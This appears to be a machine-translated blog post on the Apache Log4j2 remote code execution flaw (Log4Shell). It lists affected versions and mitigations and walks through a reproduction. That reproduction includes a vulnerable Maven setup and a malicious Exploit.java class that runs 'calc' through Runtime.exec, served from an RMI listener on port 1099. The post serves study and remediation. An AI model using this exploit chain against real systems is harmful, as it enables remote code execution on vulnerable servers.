brief introduction

         In recent days, , Apache Log4j Details of the remote code execution vulnerability are disclosed , Once the vulnerability is exploited by an attacker, it will cause serious harm . After rapid analysis and confirmation , The vulnerability has an extremely wide range of effects , The harm is extremely serious , It is suggested to start emergency response at the first time for repair .

Summary of vulnerability

        Apache Log4j2 It's an open source Java Logging tools , A large number of business frameworks use this component . This vulnerability is for Log4j2 Provided lookup Function , This function allows developers to read the configuration in the corresponding environment through some protocols . But in the process of implementation , The input is not strictly judged , Thus causing the occurrence of vulnerabilities .

scope

Apache Log4j 2.x <= 2.15.0-rc1

Loophole recurrence

1. Environment building

         Create a new maven project , And import Log4j The dependency package of

<dependencies>
    <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.11.0</version>
    </dependency>
    <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.11.0</version>
    </dependency>
</dependencies>

 2. Exploit , Use Log4jTest.java test  

 3. Compile a malicious class Exploit.class

First new Exploit.java, And compile it as class file .

class Exploit {
    static {
        System.err.println("Evil has been there");
        try{
            String cmds="calc";
            Runtime.getRuntime().exec(cmds);
        }catch(Exception e){
            e.printStackTrace();
        }
    }
}

 4. Hackers create a RMI service , binding Exploit, And execute start 1099 Listening port

5. function Log4jTest.java You can access the malicious class and execute the "calc" command

Repair method

         at present ,Apache The official has released a new version to complete the vulnerability repair , Users are advised to conduct self inspection as soon as possible , And upgrade to the latest version in time ：

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

It is recommended to take the following temporary measures to prevent vulnerabilities at the same time ：

• add to jvm Launch parameters -Dlog4j2.formatMsgNoLookups=true;

• In the application classpath Add below log4j2.component.properties The configuration file , The content of the document is log4j2.formatMsgNoLookups=true;

• JDK Use 11.0.1、8u191、7u201、6u211 And above ;

• Deploy and use third-party firewall products for security protection .

Reference link :

https://www.bilibili.com/video/BV1FL411E7g3

https://mp.weixin.qq.com/s/AqbGHYHLhRemxmroi2W6Iw

Technical communication

The source code is placed in the comment area

Welcome to reprint 、 Collection 、 Gain some praise and support ！